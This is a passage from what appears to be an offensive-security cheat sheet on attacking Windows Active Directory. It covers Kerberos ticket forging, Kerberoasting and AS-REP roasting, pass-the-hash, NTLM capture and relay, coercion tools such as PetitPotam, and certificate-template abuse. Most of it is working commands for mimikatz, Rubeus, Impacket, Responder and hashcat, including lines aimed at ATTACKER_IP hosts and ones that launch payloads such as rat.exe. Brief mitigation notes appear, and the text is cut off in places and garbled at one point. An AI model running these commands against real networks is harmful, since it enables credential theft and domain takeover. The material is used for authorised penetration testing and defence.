S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck -kerberos_ticket_purge -kerberos_ticket_use /root/Downloads/pentestlabuser.tck -kerberos_ticket_list -``` - -#### Using a ticket on Linux - -```powershell -# Convert the ticket kirbi to ccache with kekeo -misc::convert ccache ticket.kirbi - -# Alternatively you can use ticketer from Impacket -./ticketer.py -nthash a577fcf16cfef780a2ceb343ec39a0d9 -domain-sid S-1-5-21-2972629792-1506071460-1188933728 -domain amity.local mbrody-da - -ticketer.py -nthash HASHKRBTGT -domain-sid SID_DOMAIN_A -domain DEV Administrator -extra-sid SID_DOMAIN_B_ENTERPRISE_519 -./ticketer.py -nthash e65b41757ea496c2c60e82c05ba8b373 -domain-sid S-1-5-21-354401377-2576014548-1758765946 -domain DEV Administrator -extra-sid S-1-5-21-2992845451-2057077057-2526624608-519 - -export KRB5CCNAME=/home/user/ticket.ccache -cat $KRB5CCNAME - -# NOTE: You may need to comment the proxy_dns setting in the proxychains configuration file -./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 -``` - -If you need to swap ticket between Windows and Linux, you need to convert them with `ticket_converter` or `kekeo`. - -```powershell -root@kali:ticket_converter$ python ticket_converter.py velociraptor.ccache velociraptor.kirbi -Converting ccache => kirbi -root@kali:ticket_converter$ python ticket_converter.py velociraptor.kirbi velociraptor.ccache -Converting kirbi => ccache -``` - - -Mitigations: -* Hard to detect because they are legit TGT tickets -* Mimikatz generate a golden ticket with a life-span of 10 years - - -### Pass-the-Ticket Silver Tickets - -Forging a Service Ticket (ST) require machine account password (key) or NT hash of the service account. - -```powershell -# Create a ticket for the service -mimikatz $ kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE - -# Examples -mimikatz $ /kerberos::golden /domain:adsec.local /user:ANY /sid:S-1-5-21-1423455951-1752654185-1824483205 /rc4:ceaxxxxxxxxxxxxxxxxxxxxxxxxxxxxx /target:DESKTOP-01.adsec.local /service:cifs /ptt -mimikatz $ kerberos::golden /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /rc4:b18b4b218eccad1c223306ea1916885f /user:stegosaurus /service:cifs /target:labwws02.jurassic.park - -# Then use the same steps as a Golden ticket -mimikatz $ misc::convert ccache ticket.kirbi - -root@kali:/tmp$ export KRB5CCNAME=/home/user/ticket.ccache -root@kali:/tmp$ ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 -``` - -Interesting services to target with a silver ticket : - -| Service Type | Service Silver Tickets | Attack | -|---------------------------------------------|------------------------|--------| -| WMI | HOST + RPCSS | `wmic.exe /authority:"kerberos:DOMAIN\DC01" /node:"DC01" process call create "cmd /c evil.exe"` | -| PowerShell Remoting | CIFS + HTTP + (wsman?) | `New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC` | -| WinRM | HTTP + wsman | `New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC` | -| Scheduled Tasks | HOST | `schtasks /create /s dc01 /SC WEEKLY /RU "NT Authority\System" /IN "SCOM Agent Health Check" /IR "C:/shell.ps1"` | -| Windows File Share (CIFS) | CIFS | `dir \\dc01\c$` | -| LDAP operations including Mimikatz DCSync | LDAP | `lsadump::dcsync /dc:dc01 /domain:domain.local /user:krbtgt` | -| Windows Remote Server Administration Tools | RPCSS + LDAP + CIFS | / | - - -Mitigations: -* Set the attribute "Account is Sensitive and Cannot be Delegated" to prevent lateral movement with the generated ticket. - - -### Pass-the-Ticket Diamond Tickets - -> Request a legit low-priv TGT and recalculate only the PAC field providing the krbtgt encryption key - -Require: -* krbtgt NT Hash -* krbtgt AES key - -```ps1 -ticketer.py -request -domain 'lab.local' -user 'domain_user' -password 'password' -nthash 'krbtgt/service NT hash' -aesKey 'krbtgt/service AES key' -domain-sid 'S-1-5-21-...' -user-id '1337' -groups '512,513,518,519,520' 'baduser' - -Rubeus.exe diamond /domain:DOMAIN /user:USER /password:PASSWORD /dc:DOMAIN_CONTROLLER /enctype:AES256 /krbkey:HASH /ticketuser:USERNAME /ticketuserid:USER_ID /groups:GROUP_IDS -``` - - -### Pass-the-Ticket Sapphire Tickets - -> Requesting the target user's PAC with `S4U2self+U2U` exchange during TGS-REQ(P) (PKINIT). - -The goal is to mimic the PAC field as close as possible to a legitimate one. - -Require: -* [Impacket PR#1411](https://github.com/SecureAuthCorp/impacket/pull/1411) -* krbtgt AES key - -```ps1 -# baduser argument will be ignored -ticketer.py -request -impersonate 'domain_adm' -domain 'lab.local' -user 'domain_user' -password 'password' -aesKey 'krbtgt/service AES key' -domain-sid 'S-1-5-21-...' 'baduser' -``` - - -## Kerberoasting - -> "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names) - -Any valid domain user can request a kerberos ticket (ST) for any domain service. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as. - - -* [GetUserSPNs](https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py) from Impacket Suite - ```powershell - $ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request - - Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies - - ServicePrincipalName Name MemberOf PasswordLastSet LastLogon - -------------------- ------------- -------------------------------------------------------- ------------------- ------------------- - active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40 2018-12-03 17:11:11 - - $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$424338c0a3c3af43[...]84fd2 - ``` - -* CrackMapExec Module - ```powershell - $ crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --kerberoast output.txt - LDAP 10.0.2.11 389 dc01 [*] Windows 10.0 Build 17763 x64 (name:dc01) (domain:lab.local) (signing:True) (SMBv1:False) - LDAP 10.0.2.11 389 dc01 $krb5tgs$23$*john.doe$lab.local$MSSQLSvc/dc01.lab.local~1433*$efea32[...]49a5e82$b28fc61[...]f800f6dcd259ea1fca8f9 - ``` - -* [Rubeus](https://github.com/GhostPack/Rubeus) - ```powershell - # Stats - Rubeus.exe kerberoast /stats - ------------------------------------- ---------------------------------- - | Supported Encryption Type | Count | | Password Last Set Year | Count | - ------------------------------------- ---------------------------------- - | RC4_HMAC_DEFAULT | 1 | | 2021 | 1 | - ------------------------------------- ---------------------------------- - - # Kerberoast (RC4 ticket) - Rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD /outfile:hash.txt - - # Kerberoast (AES ticket) - # Accounts with AES enabled in msDS-SupportedEncryptionTypes will have RC4 tickets requested. - Rubeus.exe kerberoast /tgtdeleg - - # Kerberoast (RC4 ticket) - # The tgtdeleg trick is used, and accounts without AES enabled are enumerated and roasted. - Rubeus.exe kerberoast /rc4opsec - ``` - -* [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) - ```powershell - Request-SPNTicket -SPN "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local" - ``` - -* [bifrost](https://github.com/its-a-feature/bifrost) on **macOS** machine - ```powershell - ./bifrost -action asktgs -ticket doIF<...snip...>QUw= -service host/dc1-lab.lab.local -kerberoast true - ``` - -* [targetedKerberoast](https://github.com/ShutdownRepo/targetedKerberoast) - ```powershell - # for each user without SPNs, it tries to set one (abuse of a write permission on the servicePrincipalName attribute), - # print the "kerberoast" hash, and delete the temporary SPN set for that operation - targetedKerberoast.py [-h] [-v] [-q] [-D TARGET_DOMAIN] [-U USERS_FILE] [--request-user username] [-o OUTPUT_FILE] [--use-ldaps] [--only-abuse] [--no-abuse] [--dc-ip ip address] [-d DOMAIN] [-u USER] [-k] [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key] - ``` - - -Then crack the ticket using the correct hashcat mode (`$krb5tgs$23`= `etype 23`) - -| Mode | Description | -|---------|--------------| -| `13100` | Kerberos 5 TGS-REP etype 23 (RC4) | -| `19600` | Kerberos 5 TGS-REP etype 17 (AES128-CTS-HMAC-SHA1-96) | -| `19700` | Kerberos 5 TGS-REP etype 18 (AES256-CTS-HMAC-SHA1-96) | - -```powershell -./hashcat -m 13100 -a 0 kerberos_hashes.txt crackstation.txt -./john --wordlist=/opt/wordlists/rockyou.txt --fork=4 --format=krb5tgs ~/kerberos_hashes.txt -``` - - -Mitigations: -* Have a very long password for your accounts with SPNs (> 32 characters) -* Make sure no users have SPNs - -## KRB_AS_REP Roasting - -> If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting - -**Requirements**: -- Accounts with the attribute **DONT_REQ_PREAUTH** (`PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose`) - -* [Rubeus](https://github.com/GhostPack/Rubeus) - ```powershell - C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user /format:hashcat /outfile:hashes.asreproast - [*] Action: AS-REP roasting - [*] Target User : TestOU3user - [*] Target Domain : testlab.local - [*] SamAccountName : TestOU3user - [*] DistinguishedName : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local - [*] Using domain controller: testlab.local (192.168.52.100) - [*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user' - [*] Connecting to 192.168.52.100:88 - [*] Sent 169 bytes - [*] Received 1437 bytes - [+] AS-REQ w/o preauth successful! - [*] AS-REP hash: - - $krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)... - ``` - -* [GetNPUsers](https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py) from Impacket Suite - ```powershell - $ python GetNPUsers.py htb.local/svc-alfresco -no-pass - [*] Getting TGT for svc-alfresco - $krb5asrep$23$svc-alfresco@HTB.LOCAL:c13528009a59be0a634bb9b8e84c88ee$cb8e87d02bd0ac7a[...]e776b4 - - # extract hashes - root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast - root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast - ``` - -* CrackMapExec Module - ```powershell - $ crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --asreproast output.txt - LDAP 10.0.2.11 389 dc01 $krb5asrep$23$john.doe@LAB.LOCAL:5d1f750[...]2a6270d7$096fc87726c64e545acd4687faf780[...]13ea567d5 - ``` - -Using `hashcat` or `john` to crack the ticket. - -```powershell -# crack AS_REP messages with hashcat -root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt -root@windows:hashcat$ hashcat64.exe -m 18200 '' -a 0 c:\wordlists\rockyou.txt - -# crack AS_REP messages with john -C:\Rubeus> john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproast -``` - -**Mitigations**: -* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default). - - -## Timeroasting - -> Timeroasting takes advantage of Windows' NTP authentication mechanism, allowing unauthenticated attackers to effectively request a password hash of any computer account by sending an NTP request with that account's RID - -* [SecuraBV/Timeroast](https://github.com/SecuraBV/Timeroast) - Timeroasting scripts by Tom Tervoort - ```ps1 - sudo ./timeroast.py 10.0.0.42 | tee ntp-hashes.txt - hashcat -m 31300 ntp-hashes.txt - ``` - - -## Pass-the-Hash - -The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500. - -* Metasploit - ```powershell - use exploit/windows/smb/psexec - set RHOST 10.2.0.3 - set SMBUser jarrieta - set SMBPass nastyCutt3r - # NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack. - # NOTE2: Require the full NT hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee) - set PAYLOAD windows/meterpreter/bind_tcp - run - shell - ``` -* CrackMapExec - ```powershell - cme smb 10.2.0.2/24 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami" - ``` -* Impacket suite - ```powershell - proxychains python ./psexec.py jarrieta@10.2.0.2 -hashes :489a04c09a5debbc9b975356693e179d - ``` -* Windows RDP and mimikatz - ```powershell - sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:b73fdfe10e87b4ca5c0d957f81de6863 - sekurlsa::pth /user: /domain: /ntlm: /run:"mstsc.exe /restrictedadmin" - ``` - -You can extract the local **SAM database** to find the local administrator hash : - -```powershell -C:\> reg.exe save hklm\sam c:\temp\sam.save -C:\> reg.exe save hklm\security c:\temp\security.save -C:\> reg.exe save hklm\system c:\temp\system.save -$ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL -``` - - -## OverPass-the-Hash (pass the key) - -In this technique, instead of passing the hash directly, we use the NT hash of an account to request a valid Kerberost ticket (TGT). - -### Using impacket - -```bash -root@kali:~$ python ./getTGT.py -hashes ":1a59bd44fe5bec39c44c8cd3524dee" lab.ropnop.com -root@kali:~$ export KRB5CCNAME="/root/impacket-examples/velociraptor.ccache" -root@kali:~$ python3 psexec.py "jurassic.park/velociraptor@labwws02.jurassic.park" -k -no-pass - -# also with the AES Key if you have it -root@kali:~$ ./getTGT.py -aesKey xxxxxxxxxxxxxxkeyaesxxxxxxxxxxxxxxxx lab.ropnop.com - -root@kali:~$ ktutil -k ~/mykeys add -p tgwynn@LAB.ROPNOP.COM -e arcfour-hma-md5 -w 1a59bd44fe5bec39c44c8cd3524dee --hex -V 5 -root@kali:~$ kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM -root@kali:~$ klist -``` - -### Using Rubeus - -```powershell -# Request a TGT as the target user and pass it into the current session -# NOTE: Make sure to clear tickets in the current session (with 'klist purge') to ensure you don't have multiple active TGTs -.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /ptt - -# More stealthy variant, but requires the AES256 hash -.\Rubeus.exe asktgt /user:Administrator /aes256:[AES256HASH] /opsec /ptt - -# Pass the ticket to a sacrificial hidden process, allowing you to e.g. steal the token from this process (requires elevation) -.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe -``` - - -## Capturing and cracking Net-NTLMv1/NTLMv1 hashes - -> Net-NTLM (NTLMv1) hashes are used for network authentication (they are derived from a challenge/response algorithm and are based on the user's NT hash. - -:information_source: : Coerce a callback using PetitPotam or SpoolSample on an affected machine and downgrade the authentication to **NetNTLMv1 Challenge/Response authentication**. This uses the outdated encryption method DES to protect the NT/LM Hashes. - -**Requirements**: -* LmCompatibilityLevel = 0x1: Send LM & NTLM (`reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v lmcompatibilitylevel`) - -**Exploitation**: -* Capturing using Responder: Edit the `/etc/responder/Responder.conf` file to include the magical **1122334455667788** challenge - ```ps1 - HTTPS = On - DNS = On - LDAP = On - ... - ; Custom challenge. - ; Use "Random" for generating a random challenge for each requests (Default) - Challenge = 1122334455667788 - ``` -* Fire Responder: `responder -I eth0 --lm`, if `--disable-ess` is set, extended session security will be disabled for NTLMv1 authentication -* Force a callback: - ```ps1 - PetitPotam.exe Responder-IP DC-IP # Patched around August 2021 - PetitPotam.py -u Username -p Password -d Domain -dc-ip DC-IP Responder-IP DC-IP # Not patched for authenticated users - ``` -* If you got some `NTLMv1 hashes`, you need to format them to submit them on [crack.sh](https://crack.sh/netntlm/) - ```ps1 - username::hostname:response:response:challenge -> NTHASH:response - NTHASH:F35A3FE17DCB31F9BE8A8004B3F310C150AFA36195554972 - ``` -* Or crack them with Hashcat / John The Ripper - ```ps1 - john --format=netntlm hash.txt - hashcat -m 5500 -a 3 hash.txt - ``` -* Now you can DCSync using the Pass-The-Hash with the DC machine account - -:warning: NTLMv1 with SSP(Security Support Provider) changes the server challenge and is not quite ideal for the attack, but it can be used. - - -**Mitigations**: - -* Set the Lan Manager authentication level to `Send NTLMv2 responses only. Refuse LM & NTLM` - -## Capturing and cracking Net-NTLMv2/NTLMv2 hashes - -If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network. - -```powershell -# https://github.com/lgandx/Responder -$ sudo ./Responder.py -I eth0 -wfrd -P -v - -# https://github.com/Kevin-Robertson/InveighZero -PS > .\inveighzero.exe -FileOutput Y -NBNS Y -mDNS Y -Proxy Y -MachineAccounts Y -DHCPv6 Y -LLMNRv6 Y [-Elevated N] - -# https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Invoke-Inveigh.ps1 -PS > Invoke-Inveigh [-IP '10.10.10.10'] -ConsoleOutput Y -FileOutput Y -NBNS Y –mDNS Y –Proxy Y -MachineAccounts Y -``` - -Crack the hashes with Hashcat / John The Ripper - -```ps1 -john --format=netntlmv2 hash.txt -hashcat -m 5600 -a 3 hash.txt -``` - - -## Man-in-the-Middle attacks & relaying - -NTLMv1 and NTLMv2 can be relayed to connect to another machine. - -| Hash | Hashcat | Attack method | -|---|---|---| -| LM | `3000` | crack/pass the hash | -| NTLM/NTHash | `1000` | crack/pass the hash | -| NTLMv1/Net-NTLMv1 | `5500` | crack/relay attack | -| NTLMv2/Net-NTLMv2 | `5600` | crack/relay attack | - -Crack the hash with `hashcat`. - -```powershell -hashcat -m 5600 -a 0 hash.txt crackstation.txt -``` - -### MS08-068 NTLM reflection - -NTLM reflection vulnerability in the SMB protocolOnly targeting Windows 2000 to Windows Server 2008. - -> This vulnerability allows an attacker to redirect an incoming SMB connection back to the machine it came from and then access the victim machine using the victim’s own credentials. - -* https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS08-068 - -```powershell -msf > use exploit/windows/smb/smb_relay -msf exploit(smb_relay) > show targets -``` - -### SMB Signing Disabled and IPv4 - -If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine. Also called **LLMNR/NBNS Poisoning** - -1. Open the Responder.conf file and set the value of `SMB` and `HTTP` to `Off`. - ```powershell - [Responder Core] - ; Servers to start - ... - SMB = Off # Turn this off - HTTP = Off # Turn this off - ``` -2. Run `python RunFinger.py -i IP_Range` to detect machine with `SMB signing`:`disabled`. -3. Run `python Responder.py -I ` -4. Use a relay tool such as `ntlmrelayx` or `MultiRelay` - - `impacket-ntlmrelayx -tf targets.txt` to dump the SAM database of the targets in the list. - - `python MultiRelay.py -t -u ALL` -5. ntlmrelayx can also act as a SOCK proxy with every compromised sessions. - ```powershell - $ impacket-ntlmrelayx -tf /tmp/targets.txt -socks -smb2support - [*] Servers started, waiting for connections - Type help for list of commands - ntlmrelayx> socks - Protocol Target Username Port - -------- -------------- ------------------------ ---- - MSSQL 192.168.48.230 VULNERABLE/ADMINISTRATOR 1433 - SMB 192.168.48.230 CONTOSO/NORMALUSER1 445 - MSSQL 192.168.48.230 CONTOSO/NORMALUSER1 1433 - - # You might need to select a target with "-t" - # smb://, mssql://, http://, https://, imap://, imaps://, ldap://, ldaps:// and smtp:// - impacket-ntlmrelayx -t mssql://10.10.10.10 -socks -smb2support - impacket-ntlmrelayx -t smb://10.10.10.10 -socks -smb2support - - # the socks proxy can then be used with your Impacket tools or CrackMapExec - $ proxychains impacket-smbclient //192.168.48.230/Users -U contoso/normaluser1 - $ proxychains impacket-mssqlclient DOMAIN/USER@10.10.10.10 -windows-auth - $ proxychains crackmapexec mssql 10.10.10.10 -u user -p '' -d DOMAIN -q "SELECT 1" - ``` - -**Mitigations**: - - * Disable LLMNR via group policy - ```powershell - Open gpedit.msc and navigate to Computer Configuration > Administrative Templates > Network > DNS Client > Turn off multicast name resolution and set to Enabled - ``` - * Disable NBT-NS - ```powershell - This can be achieved by navigating through the GUI to Network card > Properties > IPv4 > Advanced > WINS and then under "NetBIOS setting" select Disable NetBIOS over TCP/IP - ``` - -### SMB Signing Disabled and IPv6 - -Since [MS16-077](https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-077) the location of the WPAD file is no longer requested via broadcast protocols, but only via DNS. - -```powershell -crackmapexec smb $hosts --gen-relay-list relay.txt - -# DNS takeover via IPv6, mitm6 will request an IPv6 address via DHCPv6 -# -d is the domain name that we filter our request on - the attacked domain -# -i is the interface we have mitm6 listen on for events -mitm6 -i eth0 -d $domain - -# spoofing WPAD and relaying NTLM credentials -impacket-ntlmrelayx -6 -wh $attacker_ip -of loot -tf relay.txt -impacket-ntlmrelayx -6 -wh $attacker_ip -l /tmp -socks -debug - -# -ip is the interface you want the relay to run on -# -wh is for WPAD host, specifying your wpad file to serve -# -t is the target where you want to relay to. -impacket-ntlmrelayx -ip 10.10.10.1 -wh $attacker_ip -t ldaps://10.10.10.2 -``` - -### Drop the MIC - -> The CVE-2019-1040 vulnerability makes it possible to modify the NTLM authentication packets without invalidating the authentication, and thus enabling an attacker to remove the flags which would prevent relaying from SMB to LDAP - -Check vulnerability with [cve-2019-1040-scanner](https://github.com/fox-it/cve-2019-1040-scanner) - -```powershell -python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET' -[*] CVE-2019-1040 scanner by @_dirkjan / Fox-IT - Based on impacket by SecureAuth -[*] Target TARGET is not vulnerable to CVE-2019-1040 (authentication was rejected) -``` - -- Using any AD account, connect over SMB to a victim Exchange server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant DCSync privileges to the attacker account. The attacker account can now use DCSync to dump all password hashes in AD - ```powershell - TERM1> python printerbug.py testsegment.local/username@s2012exc.testsegment.local - TERM2> ntlmrelayx.py --remove-mic --escalate-user ntu -t ldap://s2016dc.testsegment.local -smb2support - TERM1> secretsdump.py testsegment/ntu@s2016dc.testsegment.local -just-dc - ``` - - -- Using any AD account, connect over SMB to the victim server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant Resource Based Constrained Delegation privileges for the victim server to a computer account under the control of the attacker. The attacker can now authenticate as any user on the victim server. - ```powershell - # create a new machine account - TERM1> ntlmrelayx.py -t ldaps://rlt-dc.relaytest.local --remove-mic --delegate-access -smb2support - TERM2> python printerbug.py relaytest.local/username@second-dc-server 10.0.2.6 - TERM1> getST.py -spn host/second-dc-server.local 'relaytest.local/MACHINE$:PASSWORD' -impersonate DOMAIN_ADMIN_USER_NAME - - # connect using the ticket - export KRB5CCNAME=DOMAIN_ADMIN_USER_NAME.ccache - secretsdump.py -k -no-pass second-dc-server.local -just-dc - ``` - -### Ghost Potato - CVE-2019-1384 - -Requirements: -* User must be a member of the local Administrators group -* User must be a member of the Backup Operators group -* Token must be elevated - -Using a modified version of ntlmrelayx : https://shenaniganslabs.io/files/impacket-ghostpotato.zip - -```powershell -ntlmrelayx -smb2support --no-smb-server --gpotato-startup rat.exe -``` - -### RemotePotato0 DCOM DCE RPC relay - -> It abuses the DCOM activation service and trigger an NTLM authentication of the user currently logged on in the target machine - -Requirements: -- a shell in session 0 (e.g. WinRm shell or SSH shell) -- a privileged user is logged on in the session 1 (e.g. a Domain Admin user) - -```powershell -# https://github.com/antonioCoco/RemotePotato0/ -Terminal> sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:192.168.83.131:9998 & # Can be omitted for Windows Server <= 2016 -Terminal> sudo ntlmrelayx.py -t ldap://192.168.83.135 --no-wcf-server --escalate-user winrm_user_1 -Session0> RemotePotato0.exe -r 192.168.83.130 -p 9998 -s 2 -Terminal> psexec.py 'LAB/winrm_user_1:Password123!@192.168.83.135' -``` - - -### DNS Poisonning - Relay delegation with mitm6 - -Requirements: -- IPv6 enabled (Windows prefers IPV6 over IPv4) -- LDAP over TLS (LDAPS) - -> ntlmrelayx relays the captured credentials to LDAP on the domain controller, uses that to create a new machine account, print the account's name and password and modifies the delegation rights of it. - -```powershell -git clone https://github.com/fox-it/mitm6.git -cd /opt/tools/mitm6 -pip install . - -mitm6 -hw ws02 -d lab.local --ignore-nofqnd -# -d: the domain name that we filter our request on (the attacked domain) -# -i: the interface we have mitm6 listen on for events -# -hw: host whitelist - -ntlmrelayx.py -ip 10.10.10.10 -t ldaps://dc01.lab.local -wh attacker-wpad -ntlmrelayx.py -ip 10.10.10.10 -t ldaps://dc01.lab.local -wh attacker-wpad --add-computer -# -ip: the interface you want the relay to run on -# -wh: WPAD host, specifying your wpad file to serve -# -t: the target where you want to relay to - -# now granting delegation rights and then do a RBCD -ntlmrelayx.py -t ldaps://dc01.lab.local --delegate-access --no-smb-server -wh attacker-wpad -getST.py -spn cifs/target.lab.local lab.local/GENERATED\$ -impersonate Administrator -export KRB5CCNAME=administrator.ccache -secretsdump.py -k -no-pass target.lab.local -``` - -### Relaying with WebDav Trick - -> Example of exploitation where you can coerce machine accounts to authenticate to a host and combine it with Resource Based Constrained Delegation to gain elevated access. It allows attackers to elicit authentications made over HTTP instead of SMB - -**Requirement**: -* WebClient service - -**Exploitation**: -* Disable HTTP in Responder: `sudo vi /usr/share/responder/Responder.conf` -* Generate a Windows machine name: `sudo responder -I eth0`, e.g: WIN-UBNW4FI3AP0 -* Prepare for RBCD against the DC: `python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support` -* Discover WebDAV services - ```ps1 - webclientservicescanner 'domain.local'/'user':'password'@'machine' - crackmapexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav - GetWebDAVStatus.exe 'machine' - ``` -* Trigger the authentication to relay to our nltmrelayx: `PetitPotam.exe WIN-UBNW4FI3AP0@80/test.txt 10.0.0.4`, the listener host must be specified with the FQDN or full netbios name like `logger.domain.local@80/test.txt`. Specifying the IP results in anonymous auth instead of System. - ```ps1 - # PrinterBug - dementor.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "ATTACKER_IP" - SpoolSample.exe "ATTACKER_IP" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" - - # PetitPotam - Petitpotam.py "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "ATTACKER_IP" - Petitpotam.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "ATTACKER_IP" - PetitPotam.exe "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "ATTACKER_IP" - ``` -* Use the created account to ask for a service ticket: - ```ps1 - .\Rubeus.exe hash /domain:purple.lab /user:WVLFLLKZ$ /password:'iUAL)l -pyrdp-mitp.py : # with custom port -pyrdp-mitm.py -k private_key.pem -c certificate.pem # with custom key and certificate -``` -* Exploitation - * If Network Level Authentication (NLA) is enabled, you will obtain the client's NetNTLMv2 challenge - * If NLA is disabled, you will obtain the password in plaintext - * Other features are available such as keystroke recording -* Alternatives - * S3th: https://github.com/SySS-Research/Seth, performs ARP spoofing prior to launching the RDP listener - -## Active Directory Certificate Services - -* Find ADCS Server - * `crackmapexec ldap domain.lab -u username -p password -M adcs` - * `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=,OU=Users,DC=domain,DC=local' -w '' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName` -* Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping`, `certutil -dump` - -### ESC1 - Misconfigured Certificate Templates - -> Domain Users can enroll in the **VulnTemplate** template, which can be used for client authentication and has **ENROLLEE_SUPPLIES_SUBJECT** set. This allows anyone to enroll in this template and specify an arbitrary Subject Alternative Name (i.e. as a DA). Allows additional identities to be bound to a certificate beyond the Subject. - -Requirements: -* Template that allows for AD authentication -* **ENROLLEE_SUPPLIES_SUBJECT** flag -* [PKINIT] Client Authentication, Smart Card Logon, Any Purpose, or No EKU (Extended/Enhanced Key Usage) - -Exploitation: -* Use [Certify.exe](https://github.com/GhostPack/Certify) to see if there are any vulnerable templates - ```ps1 - Certify.exe find /vulnerable - Certify.exe find /vulnerable /currentuser - # or - PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local' - # or - certipy 'domain.local'/'user':'password'@'domaincontroller' find -bloodhound - ``` -* Use Certify, [Certi](https://github.com/eloypgz/certi) or [Certipy](https://github.com/ly4k/Certipy) to request a Certificate and add an alternative name (user to impersonate) - ```ps1 - # request certificates for the machine account by executing Certify with the "/machine" argument from an elevated command prompt. - Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:VulnTemplate /altname:domadmin - certi.py req 'contoso.local/Anakin@dc01.contoso.local' contoso-DC01-CA -k -n --alt-name han --template UserSAN - certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC1' -alt 'administrator@corp.local' - ``` -* Use OpenSSL and convert the certificate, do not enter a password - ```ps1 - openssl pkcs12 -in cert.pem 